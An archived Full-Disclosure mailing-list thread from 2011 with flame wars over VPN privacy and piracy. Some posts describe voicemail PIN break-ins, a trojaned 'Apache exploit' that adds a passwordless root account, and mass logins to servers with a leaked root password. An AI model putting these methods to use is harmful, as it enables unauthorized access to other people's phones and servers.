  wares... or, police having to waste time, on wares... i think police
  themselves detest those things, and hence why the clouds still linger over
  some websites which should be 'down' yet, are not.

 it's not working like that, you can't expect that the cops/feds won't
 chase piracy while there are more serious crimes unresolved.
 sadly.

  That, is simply isp not complying with a takedown order which is, completely
  up to them. Why would they want to lose good customers/people who bring
  them even traffic and revenue thru websites.

 it's simple: not worth taking the risk.
 if you won't comply, you are risking that your whole business can go
 down the toilet, and if and when you can prove that you are right, you
 lost your business already.
 and usually those customers are the minority of your client base, and
 they are a risk for your own infrastructure also (they can hack/abuse
 your own servers).

  I don't promote ads on my one, but i have always maintained a very steady and
  friendly, helpful with security, to my hosters which they really appreciated.
  So, sometimes being in IT pays off... I guess... but what a struggle to get
  anywhere, even for the harder stuff, and people like n3td34v completely don't
  see that,

 yep, we only see what you show on this list, and so far, you didn't
 really work on your whitehat image.

  the whole issue of freedom of speech and, security especially, ie:
  when i submit a PoC, anything nowadays, could happen..

 yeah, the net seems to be more similar to real life, it's much
 harder to be truly anonymous nowadays.

  these are the clouds i really wish to lift, in order though, I first must
  set some people on this list into the same state of mind, which is proving
  to be a little harder than i expected.

 I think the problem is more about how you deliver the message, not the
 message itself.

  n3td3v thinks i am personally attacking his whole persona, which, i should,
  and could, maybe pentest him and then, see if that is illegal. If so then, i
  would assume my tool of choice, nmap, would also be in danger ?

 you brought this (cat)fight to the mailing list, so of course he
 thinks that you are personally attacking him.

  hehe... see how this can get offtopic, but really it is the same topic of
  security/vpn and now, i am bringing it to an isp and Noc level... and
  hopefully, some others will see the things said, and indeed, they know there
  is a lot more hard crime that could be done by police, which would benefit
  ALL communities, and people IRL, as in kids, in some cases.

 see above, you can't expect that lesser crimes are ignored because
 there are other more serious crimes out there.

  I also detest the use of the law, for low level crappy crimes when they
  could be rm -rf'ing REAL dangerous people who actually, are trying to harm
  others, or simply, out for extortion and no other reason.

 see above.

  I can say now safely, i am from .au and, i feel happy we have the laws here
  for serious crimes, i detested the dd0s kiddy david cecil's 'defacing' and,
  trying to cry out for work... what a b*m... I simply look in the paper, and
  ring.
  Anyhows, he is in a cell, and for good reason, and, ofc, things with him got
  more serious because he was defrauding people of money.
  This is when, things go down, when you directly steal funds, ie, if i were
  to steal shares in M$ using a PC, i'd be considered a cyber-terrorist, and,
  

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
No not the broken window effect, his outlook about how being a small
criminal, always becoming a bigger one, is that the same? Oh well.. then...
I beg to differ with you but, I don't believe that statement, if so, then we
would have a lot more arrests indeed.
btw for those thinking there will be any 'fight' with n3td3v , cmon, guys
have faith, I was merely introducing myself to him after he rudely, and, I
do mean that, rudely and invasively started throwing about, words a bit too
long for people of that intellect.
When his IQ grows, so will my affection for that mailing list again ;-)
The broken window effect, seems, broken.
or, am I just, thinking, that I am one of a minority here, which, I doubt if
you were to count REAL FRIGGING LIFE YOU MORON.
Anyhow have a nice day, you are of the intellect of a n3td3v, please join
that list for cock-wipphings.
have a nice day, sire.
xd


On 3 October 2011 19:37, Kornél Lugosi coorn...@gmail.com wrote:

  So pleease take the socialist theories elswhere.
 Could you elaborate on how the Broken Window effect is a Socialist theory
 ?

 Kornel

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Massive Security Vulnerability In HTC Android Devices (EVO 3D, 4G, Thunderbolt, Others) Exposes Phone Numbers, GPS, SMS, Emails Addresses, Much More

2011-10-03 Thread GloW - XD
No surprise... their ext4 partitions are completely vulnerable.. try tell an
android user that, tho. Spender (grsecurity.net) has exposed the ext4 bug,
which allows remote user addition to, whatever kernel, I assume runs the ext4
right... with some small changes ofc to code... so, it is strange they don't
patch, I myself use 1.6 , but, wow this really blows things for many users..
interesting stuff, and maybe is good thing I use the old 1.6 api.. hehe.
seems the newer the stuff, the more the chances of malicious activity.. I guess NOTW
management must've known this one for sure.
thx for that, insightful, and, reminds me more that, a phone nowadays is
almost as dangerous as a laptop in your hand.
cheers,
xd


On 3 October 2011 19:30, Di. Tled dit...@parano.me wrote:


 http://www.androidpolice.com/2011/10/01/massive-security-vulnerability-in-htc-android-devices-evo-3d-4g-thunderbolt-others-exposes-phone-numbers-gps-sms-emails-addresses-much-more/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
Agreed, if exposed to this environment, one will retaliate usually, and
then, hate authority...
Although, I know people of an intellectual nature, could be used and, in
society indeed, even if it is community work @ google! ha... 10hrs free
unpaid work of fun!
I would certainly take the rehab, coming into a normal society, as a
contributor, not pest.
cheers


On 3 October 2011 22:21, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

 Small criminal can become big criminal if put in current prison system. Not
 always, but a lot will. You put (As example) small hacker in prison with
 lots of crooks, etc. Crooks see him/her as an asset for future work, and on
 the outside they become bigger criminal. Max Butler is a fine example of the
 failings of punitive justice.

 Also, lol, tag soup it is xD




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Massive Security Vulnerability In HTC Android Devices (EVO 3D, 4G, Thunderbolt, Others) Exposes Phone Numbers, GPS, SMS, Emails Addresses, Much More

2011-10-03 Thread GloW - XD
haha.. reminds me of old days of PBXs!

hang each others voicemail greetings for fun...

rofl.. we used to press 1+# and 0+# or 1+* sometimes, always one of those
combos.. together (produce a sharper tone) but had to be that combo, on old
analogues, it would break thru most answering-machines and we could then
change for example "welcome to the dean's residence.." to "welcome to hot,
sweaty" u get the drift :P
lol... those days are over for me now but, darn miss analogue!
gnite!
xde


On 3 October 2011 22:24, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

 NOTW Hacking method for phones is nothing to do with this. Voicemail
 hacking in the UK involves calling the victim, hammering the # button while
 the phone rings, and being redirected to their voicemail box. Then you just
 press  and # and DONE! (sometimes they have a password, but a 4 digit
 pass is 10,000 combinations. Most people use easy to remember ones so a
 simple bit of SE and some simple looking at the phone keypad and BOOM!
 done!)

 As kids we used to do this to each other and change each others voicemail
 greetings for fun... Nothing has changed in the UK and Eire since. In fact,
 I will post again in an hour to confirm - I will break into my own
 voicemails and check.




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
Wow, I am impressed jacqui, you are VERY very aware of the law, more so than
me!
I have not seen that yet.. well, not so good!
I am impressed, because I don't really look at taking out the sites or,
people who claim to be pros etc, and, really, I should never have begun the
thread... altho, I saw he is a *popular* guy..
cheers , your work is brilliant.
xd


On 4 October 2011 01:57, Jacqui Caren-home jacqui.ca...@ntlworld.com wrote:

 On 03/10/2011 16:16, Laurelai wrote:
  that html makes my eyes want to bleed

 The site is obviously commercial, hence getting the below revoked
 should be a doddle via a complaint to enom.

 Registrant:
 Andrew Wallace

 Registrant type:
 UK Individual

 Registrant's address:
 The registrant is a non-trading individual who has opted to have
 their
 address omitted from the WHOIS service.

 The above only applies if you are not advertising, selling or trading in
 any manner.


 UK and EU law regarding commercial web sites is quite well defined but very
 rarely enforced by UK plod etc. It's pretty easy to quote AUP, UK and EU laws
 against this sort of site to a UK WSP (IIRC Google UK are the WSP).

 I suspect the site will break the Google AUP somehow - given the lack of
 business contact details and the use of hidden address details I suspect
 Google would remove the site then ask questions, hence the need to execute
 the enom/nominet complaint first :-)


 Jacqui



Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
Well ok, true that HTML is more secure.
I would rather run HTML 2/3, well, 2 is the norm isn't it.. than PHP any day.
Good point.
cheers,
xd


On 3 October 2011 23:51, SanguineRose sanguiner...@occultusterra.com wrote:

 That is awesome. I approve of this 90s HTML code and bring back the
 good old days! HTML 3.0 is the stuff but that might be HTML 2.0 I
 don't remember.

 On Mon, Oct 3, 2011 at 4:39 AM, Jacqui Caren-home
 jacqui.ca...@ntlworld.com wrote:
  On 02/10/2011 18:38, Stefan Jon Silverman wrote:
  oy, list newbie meets n3td3v -- this should be fun
 
  Just looked at this site. Shudder.
 
  FYI: this is PART of one sentence!
  This site should be linked to within the wikip definition of tag soup
 :-)
 
 
  font color=#414B56 size=2 is a professional consu
  ltancy /fontfontfontfont size=3font size=4fontfontfont
 size=3font
  size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/font
  fontfontfont size=3font size=4fontfontfont
 size=3font size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/fontbr /
  br /
  font size=3font size=4font size=3font size=2font
 color=#414B56font s
  ize=2
  offering business services to a wide range of clients within
 /font/font/font/font
  /font/fontfontfontfont size=3font size=4fontfontfont
 size=3font
  size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/fontfontfontfont
 size=3font
  size=4fontfontfont size=3font size=4
  /font/font/font/font/font/font/font/fontbr /
  font size=3font size=4font size=3font size=2font
 color=#414B56font s
  ize=2
  br /
  the UK industry./fontbbr /
 

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread GloW - XD
Yes, it is legit... however that's a backdoored copy I believe; the actual
'proper' one has an execl() type method... no shellcode, and no evil ;)


On 4 October 2011 01:31, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some 0day
 and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread GloW - XD
naw naw... really, it works... please exec and attack Apaches ;')
lol.



On 4 October 2011 02:02, John Jacobs flamdu...@hotmail.com wrote:



 http://packetstormsecurity.org/files/25728/w000t-shell.c.html

 It's a trojan, based on the w00t-shell.c code; the shellcode adds a
 passwordless root account under the name w000t.


 Date: Mon, 3 Oct 2011 15:31:29 +0100
 From: d.martyn.fulldisclos...@gmail.com
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Apache 2.2.17 exploit?

 I regularly trawl Pastebin.com to find code - often idiots leave some 0day
 and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.


 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren
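
The message above identifies the pastebin "exploit" as a trojan whose shellcode adds a passwordless root account named w000t. As an added example (not code from the thread, and not derived from w00t-shell.c), here is a small audit that checks passwd and shadow text for exactly that symptom: an extra UID 0 account, or an account that can log in with no password at all. The sample passwd/shadow lines are constructed for the example; on a real host you would feed it the contents of /etc/passwd and /etc/shadow (reading shadow needs root), or the two files copied out of a disk image.

```python
"""Added example (not from the thread or from w00t-shell.c): audit passwd and
shadow text for the symptom the post describes, a passwordless UID-0 account."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    user: str
    reason: str


# Constructed sample data for the example; the last line of each file is the
# kind of entry the trojan is described as adding (UID 0, empty password field).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
w000t::0:0::/:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhash:15600:0:99999:7:::
daemon:*:15600:0:99999:7:::
alice:$6$othersalt$otherhash:15600:0:99999:7:::
w000t::15600:0:99999:7:::
"""


def parse_colon_file(text):
    """Yield the colon-separated fields of each non-empty, non-comment line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line.split(":")


def find_suspicious_accounts(passwd_text, shadow_text):
    """Return Findings for:
      - UID 0 accounts other than root
      - accounts whose passwd password field is empty (no shadow lookup happens)
      - accounts whose shadow hash field is empty (login with no password)
      - shadow entries with no matching passwd entry
    A password field of 'x' in passwd means 'look in shadow', so both files
    must be checked: a clean-looking passwd line can still hide an empty hash.
    """
    findings = []
    passwd_users = set()
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 7:
            continue  # malformed line; not a valid passwd entry
        user, password, uid = fields[0], fields[1], fields[2]
        passwd_users.add(user)
        if uid.isdigit() and int(uid) == 0 and user != "root":
            findings.append(Finding(user, "uid 0 account other than root"))
        if password == "":
            findings.append(Finding(user, "empty password field in passwd"))
    for fields in parse_colon_file(shadow_text):
        if len(fields) < 2:
            continue
        user, pw_hash = fields[0], fields[1]
        if pw_hash == "":
            findings.append(Finding(user, "empty password hash in shadow"))
        if user not in passwd_users:
            findings.append(Finding(user, "shadow entry without passwd entry"))
    return findings


def audit_files(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run the audit against real files (reading shadow needs root)."""
    with open(passwd_path) as p, open(shadow_path) as s:
        return find_suspicious_accounts(p.read(), s.read())


if __name__ == "__main__":
    for f in find_suspicious_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f.user}: {f.reason}")
```

On the sample data this reports w000t three times (UID 0, empty passwd field, empty shadow hash); a backdoor that only blanks the shadow hash of an existing user would still be caught by the third check, which is why the passwd-only inspection many one-liners do is not enough.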

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread GloW - XD
Hey Jeff,
I am glad there are people here who understand the need for real privacy
in the modern age.

The US Government has proven *repeatedly* that the more power it has the
less trustworthy it is especially when it comes to privacy concerns.

This is mainly aimed at Jeff's posting; I think I agree 100%.
That's what this topic is about, hence why I still want answers, on many
levels.
Cheers for your interest and welcome to a decent discussion about privacy,
albeit with those who are trying to ruin things.. it is an area people are
always scared to tackle, yet it affects the list more than anyone.
cheers
xd
PS: sorry to CC you Laurelai but since we are one and the same, well... rofl.
No seriously, I did not have Jeff's email in my emailer, don't know why.
tsozz.


Thank you,

On 4 October 2011 08:48, Laurelai laure...@oneechan.org wrote:

 On 10/3/2011 12:37 PM, Jeffrey Walton wrote:
  On Mon, Oct 3, 2011 at 5:21 PM, Laurelailaure...@oneechan.org  wrote:
  On 10/3/2011 12:16 PM, Ferenc Kovacs wrote:
 
  On Mon, Oct 3, 2011 at 10:35 PM, Laurelailaure...@oneechan.org
  wrote:
 
  On 10/3/2011 10:42 AM, Antony widmal wrote:
 
  Using an external VPN provider to cover your trace clearly shows your
  incompetency and your idiot assumption.
  Trying to blame the VPN provider rather than accepting your mistake
  and learning from it clearly show your 3 years old mentality.
 
  Also, could you please stop posting as GLOW Xd as well ?
  We do not need your schizophrenic script kiddie lolololol, xD,
  hugs,  spamming on this mailing list.
 
  You being on this mailing list is once again not the best idea.
 
  Thanks,
  Antony
 
  Actually XD and me are two different people. Second issues of privacy
  are always relevant, not understanding that law abiding individuals
  should always be concerned about companies that hand over personal info
  at the request of an authority figure are the ones with three year old
  mentalities.
 
  maybe they are law abiding companies? :)
  this whole fuss wouldn't have happened, if everybody could just stay a
  law abiding citizen.
 
   The idea that if you've done nothing wrong, you have nothing to worry
   about assumes that the government is full of good people that would not
   abuse their power, ever. Even if this were true now, we cannot be sure
  it'll
   be true in the future and it's damn sure not true now.
   Definitely not true in the past. Confer: Martin Luther King was
   subjected to tens of thousands of illegal wire taps by the FBI because
   he (and a lot of other people) felt black folks should get the same
   rights as white folks.
 
  The guy who did it was honored in death, and the bureau he helped
  shape actually carries fidelity and integrity in their motto.
  Twisted but true.
 
  Jeff
 I am glad there are people here who understand the need for real privacy
 in the modern age.

 The US Government has proven *repeatedly* that the more power it has the
 less trustworthy it is especially when it comes to privacy concerns.


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread GloW - XD
The media and such often gloss over the human aspects of an incident.

Bang, that's the thing that will get you in jail, or no jail.
The press pushes it on, the people are always then arrested, because the
public need *answers* even when they do not understand much of the time what
exactly has happened, and wouldn't even if it was explained to them..
That's the biggest thing affecting it, victim impact, and whether the victim's
impact is press would help it, but they could just privately fund the arrest
if there are the right things in place, i.e. treaties, and LEO etc. is involved.
That's kind of irrelevant, and only a small bunch of cases I would assume...
but there is much we do not see nor hear about.


On 4 October 2011 03:35, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

 *laughs* I wholeheartedly agree, and the fact it is considered a beautiful
 language shows me that anyone who considers it beautiful in any way shape
 or form MUST be on fairly heavy doses of LSD... (I myself use Perl quite a
 bit, as I can understand it and it is relatively easy to use).

 My comments regarding intoxicants and coding/hacking are an errant thought
 regarding the fact that sometimes a malicious hacker may well be of impaired
 judgement (intoxicated) while doing evil work, and often may well feel
 remorse afterwards.
 One malicious/blackhat hacker I know of happened to suffer a LOT of
 personal grief (ruined his personal life for a while and suffered a bit of
 mental imbalance for a while) as a result of his drinking habits and his
 obsessiveness with his work. And that was before law enforcement caught up
 with him. Strangely enough, since LE got involved he has been on the
 straight and narrow - sober for a while - and getting along with his
 education, along with fixing his own affairs. We recently discussed how he
 felt his actions were kind of an endless black hole - he felt he just could
 not stop, as it was the only thing he could rely on.

 Remember - even the malicious guys are human too. The media and such often
 gloss over the human aspects of an incident.

 Perhaps Christian can cease and desist with his pointless flaming and if he
 has an issue he can perhaps directly email those of us who offend him
 rather than clogging the thread with anger?

 On Mon, Oct 3, 2011 at 6:38 PM, Laurelai laure...@oneechan.org wrote:

 On 10/3/2011 8:36 AM, valdis.kletni...@vt.edu wrote:

 On Mon, 03 Oct 2011 09:11:33 PDT, Laurelai said:

  I know a guy who codes perl on LSD, writes good code too.

 To be fair, it's hard to tell if perl code was written with or without
 the use of LSD.

 It's certainly a language that shows LSD influence in the design. :)

 I know right? When i study it it almost feels like im watching a pink
 floyd video.




Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread GloW - XD
There's only 4 billion IP's to scan if he want to get all out of his
trick.

Synscan can do a subnet (class B) in ~3 minutes nowadays ;)
I would think he would find it.
I did a scan on a kit I found, root:barcelona123, and got like 100 boxes
in 10 minutes of scanning; ofc, I looked up the IP range, usually they scan
by range and classes, log to file, then log in.
It is very fast nowadays, and very effective if done properly... I have seen
this only recently become effective but, it is.. and there are plenty of
fools who will execute it as-is... that is just too easy; every box a kid
has root on, he will ofc try it *just in case that FD is wrong* ...and I have
seen one case already ;p so, it is the easiest way to engineer, *keep this
private* or pvt pvt pvt don't leak!
khehe.. best tricks ever.
xd


On 4 October 2011 02:29, n...@myproxylists.com wrote:

 
 
  http://packetstormsecurity.org/files/25728/w000t-shell.c.html
 
  It's a trojan, based on the w00t-shell.c code; the shell code adds a
  passwordless root account under the name w000t.
 

 Nice try though. I was not aware that this shellcode was freely available
 but after debugging the same shellcode I noticed that passwordless
 account.

 He'll have plenty of work to do while scanning for that SSH account.
 There's only 4 billion IP's to scan if he want to get all out of his
 trick.

 
  Date: Mon, 3 Oct 2011 15:31:29 +0100
  From: d.martyn.fulldisclos...@gmail.com
  To: full-disclosure@lists.grok.org.uk
  Subject: [Full-disclosure] Apache 2.2.17 exploit?
 
  I regularly trawl Pastebin.com to find code - often idiots leave some
 0day
  and similar there and it is nice to find.
 
  Well, seeing as I have no test boxes at the moment, can someone check
 this
  code in a VM? I am not sure if it is legit or not.
 
 
  http://pastebin.com/ygByEV2e
 
  Thanks :)
 
  ~Darren
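
The message above describes the other half of the w000t story: mass scanning IP ranges for a fixed root password (root:barcelona123), logging hits to a file, then logging in. As an added example (not code from the thread), here is the detection logic a victim would run over sshd syslog lines to spot that pattern: a source that fails repeatedly and then gets an "Accepted password for root". The log lines are constructed for the example, and the regex encodes an assumption about the host's syslog-style sshd format; adjust it for journald or other layouts.

```python
"""Added example (not from the thread): flag root-password spraying and the
successful login that follows it in sshd log text. Log lines are constructed
for the example, not captured from a real host."""
import re
from collections import defaultdict

# Assumed syslog-style sshd format: "<ts> <host> sshd[<pid>]: <result> password
# for [invalid user] <user> from <ip> port <port> ssh2". Publickey logins do not
# match on purpose; they are not what a password spray produces.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

SAMPLE_LOG = """\
Oct  3 14:01:02 web1 sshd[2001]: Failed password for root from 198.51.100.7 port 40211 ssh2
Oct  3 14:01:03 web1 sshd[2001]: Failed password for root from 198.51.100.7 port 40212 ssh2
Oct  3 14:01:05 web1 sshd[2001]: Failed password for root from 198.51.100.7 port 40213 ssh2
Oct  3 14:01:09 web1 sshd[2001]: Accepted password for root from 198.51.100.7 port 40219 ssh2
Oct  3 14:02:10 web1 sshd[2002]: Accepted publickey for alice from 203.0.113.5 port 50000 ssh2
Oct  3 14:03:11 web1 sshd[2003]: Failed password for invalid user admin from 192.0.2.9 port 33001 ssh2
Oct  3 14:05:00 web1 sshd[2004]: Accepted password for alice from 203.0.113.5 port 50010 ssh2
"""


def analyse(log_text, fail_threshold=3):
    """Return a dict with:
      root_password_logins: [(ts, ip)] for every password login as root
      brute_force_sources:  {ip: failures} for sources at/above fail_threshold
      compromised:          [(ts, ip)] root password logins that followed
                            >= fail_threshold failures from the same source
    Failures are counted per source IP across all usernames, since sprays
    often cycle users as well as passwords.
    """
    failures = defaultdict(int)
    root_logins, compromised = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a password auth event in the assumed format
        ts, result, user, ip = m.group("ts", "result", "user", "ip")
        if result == "Failed":
            failures[ip] += 1
            continue
        if user == "root":
            root_logins.append((ts, ip))
            if failures.get(ip, 0) >= fail_threshold:
                compromised.append((ts, ip))
    brute = {ip: n for ip, n in failures.items() if n >= fail_threshold}
    return {
        "root_password_logins": root_logins,
        "brute_force_sources": brute,
        "compromised": compromised,
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Any root password login at all is worth an alert on a host that should be key-only; the "compromised" list narrows that to the ones preceded by a failure run from the same source, which is the signature of the scan-then-login procedure the post describes. Setting PermitRootLogin to no (or prohibit-password) in sshd_config removes the target entirely, so the detection is for the hosts where that has not yet been done.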

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread GloW - XD
Laurelai, this guy is crazier than I first thought, although I do agree that
this whole thread is now a bit old and only a few people are *really*
interested in the legal issues which I'm trying to break through.
I do like how Google does their security; I'd like to hear why they do
accept a PoC as what it is.. rather than assume that that person has rooted
me, then gave me the exploit... I know that you don't have to root people
to tell them they *could* be rooted...
Anyhow, that's just the actual *topic* and some thoughts I have, as I see
Google has awesome practice and payouts for their stuff, and it seems to
keep them as secure as one could be, being a company their size.
As for this crud about me being Laurelai, no, and I don't and never will be.
Go do some homework dude.. you have stuff wrong.

On 10/3/2011 10:42 AM, Antony widmal wrote:
 Using an external VPN provider to cover your trace clearly shows your
 incompetency and your idiot assumption.
 Trying to blame the VPN provider rather than accepting your mistake
 and learning from it clearly show your 3 years old mentality.

 Also, could you please stop posting as GLOW Xd as well ?
 We do not need your schizophrenic script kiddie lolololol, xD,
 hugs,  spamming on this mailing list.

 You being on this mailing list is once again not the best idea.

 Thanks,
 Antony

Antony (you stupid mofo);
Dude has things VERY wrong, I know Laurelai sure, but no way am I her.
Sorry on that one, you're VERY wrong. It does not take a genius to see that
there are NO links at all, and in fact many things which have seen us in the
past arguing/fighting, and only recently have we spoken.
So, could you please stfu and try to do some homework before opening the trap,
idiot.
xd


On 4 October 2011 07:35, Laurelai laure...@oneechan.org wrote:

 On 10/3/2011 10:42 AM, Antony widmal wrote:
  Using an external VPN provider to cover your trace clearly shows your
  incompetency and your idiot assumption.
  Trying to blame the VPN provider rather than accepting your mistake
  and learning from it clearly show your 3 years old mentality.
 
  Also, could you please stop posting as GLOW Xd as well ?
  We do not need your schizophrenic script kiddie lolololol, xD,
  hugs,  spamming on this mailing list.
 
  You being on this mailing list is once again not the best idea.
 
  Thanks,
  Antony
 Actually XD and me are two different people. Second issues of privacy
 are always relevant, not understanding that law abiding individuals
 should always be concerned about companies that hand over personal info
 at the request of an authority figure are the ones with three year old
 mentalities.


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread GloW - XD
hehe very true but..
I know the author of the OpenSSH fake; he actually is in my channel daily,
well, is an operator in there... he made this completely out of hate for that
same place he greets, hackforums. He did not try to hide it much either, but he
did not gather any boxes off it; he just wanted it to look like an HF
release.. and then make people hate that site.
He does not use that nickname nowadays, and I won't disclose his new one, but
anyone could enter my chan and ask :)
Ala raw sockets, true, most backdoors need that, for some kind of nastiness ;)
xd


On 4 October 2011 02:51, Dan Dart dand...@googlemail.com wrote:

  You need to be root to use raw sockets

 :(
 Translation: I shall destroy you. Mwahahaha.


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
Interesting, please elaborate Andrew. I want to see your views on this,
and no, no puns, no hatred, purely, why is FD in *crap* if they are using
that tag of Hosted by Secunia... YOUR own reasons and what you would define
as leaving

Your idea leaves grok.org.uk in a bad position Hosted and sponsored by
Secunia

Basically, saying that grok's would be able to be simply removed, as such..
am I right?
So, I am seeing more crappage, or, just explain... please.
xd


On 4 October 2011 02:46, andrew.wallace andrew.wall...@rocketmail.com wrote:

 On Mon, Oct 3, 2011 at 3:57 PM, Jacqui Caren-home 
 jacqui.ca...@ntlworld.com wrote:
  The site is obviously commercial, hence getting the below revoked
  should be a doddle via a complaint to enom.
 
  Registrant:
  Andrew Wallace
 
  Registrant type:
  UK Individual
 
  Registrant's address:
  The registrant is a non-trading individual who has opted to have
 their
  address omitted from the WHOIS service.
 
  The above only applies if you are not advertising, selling or trading in
 any manner.
 
 
   UK and EU law regarding commercial web sites is quite well defined but
  very rarely enforced by UK plod etc. It's pretty easy to quote AUP, UK and
  EU laws against this sort of site to a UK WSP (IIRC Google UK are the WSP).
  
   I suspect the site will break the Google AUP somehow - given the lack of
  business contact details and the use of hidden address details I suspect
  Google would remove the site then ask questions, hence the need to execute
  the enom/nominet complaint first :-)
 
 
  Jacqui
 
 

  Your idea leaves grok.org.uk in a bad position Hosted and sponsored by
 Secunia

  n3td3v - Security Solutions is not a registered company.

 Andrew


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
Yes, it is nice ay :)
When M$ asks me to remove it, I shall.
cheers.
xd


On 3 October 2011 06:50, SanguineRose sanguiner...@occultusterra.com wrote:

 This is rather fascinating, http://crazycoders.com/sdk/tut.htm . Your
 grand tutorial on building/making botnets aye? I rather like the
 pirated version of VC 6.0 Pro. You do seem to have a fine assortment
 of pirated software in that directory and I do believe it is rather
 illegal to distribute Microsoft Products like that.

 ~
 Index of /sdk
   Parent Directory
   PPCPACK-Sp5.rar
   SDK.rar
   VS6.SP5-FOR.VS6PRO.rar
   VS6PRO.rar
   ddk_xp.rar
   feb2003SDK.iso.tar.gz
   images/
   setting.css
   tut.htm
   vcpp5.exe
   win2kddk.exe
   windows_server_2003_sp1_ddk.iso

 Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server
 at crazycoders.com Port 80
 ~

 You, sir, are very pro at what you do. I rather like the Windows
 Server 2003 SP1 CD though. I'm not sure if Psychz Networks
 http://www.psychz.net/ would enjoy such piracy.

 Have a good day sir


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
ok...
so it will be seized :P
xd


On 3 October 2011 09:44, andrew.wallace andrew.wall...@rocketmail.com wrote:

 On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote:
  Yes, it is nice ay :)
  When M$ asks me to remove it, I shall.
  cheers.
  xd

 It doesn't work that way, your domain will be seized by DHS-ICE.

 http://www.ice.gov/about/offices/homeland-security-investigations/

 Andrew


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
gawd, is this how pathetic some people are about some warez... which is for
making some nice tools :)
lols..
It is only a little bit of the magic that I have; why concentrate on
warez... MS will annoy me if it is annoying them, I am sure of that. I don't
put my shit around for people to use on the warez scene, I only allow it for
users of the site.
So, when my hoster asks me to remove it, then I shall ask him for the
warrant; if the warrant encapsulates *me* then I will have no choice but to
rm it, right?
Until then, I will remove NOTHING.
Move on to, who the hell is this n3td3v, acting like some fed, a fat one
too.
I was all for the VPN argument; funny how this popped up about the
website so soon, and so similar like... almost like this topic, what it was,
right.
I waited for someone who acts like authority to show up; n3td3v was the first
to enter the honeypot.
Now, who else fell for it, we can see that clearly... the smarter
people on the list did not even visit that page :) I saw who exactly
visited, and exactly where they went, IP/domain and hosting provider too.
So, I am saying to n3td3v, Make me fatty.
Simple.
xd


On 3 October 2011 09:55, Jeffrey Walton noloa...@gmail.com wrote:

 On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm laure...@oneechan.org
 wrote:
  I don't think they have the authority to seize non us domains owned by
  people not in the US.
 DNS is vulnerable to attackers and legislation alike.

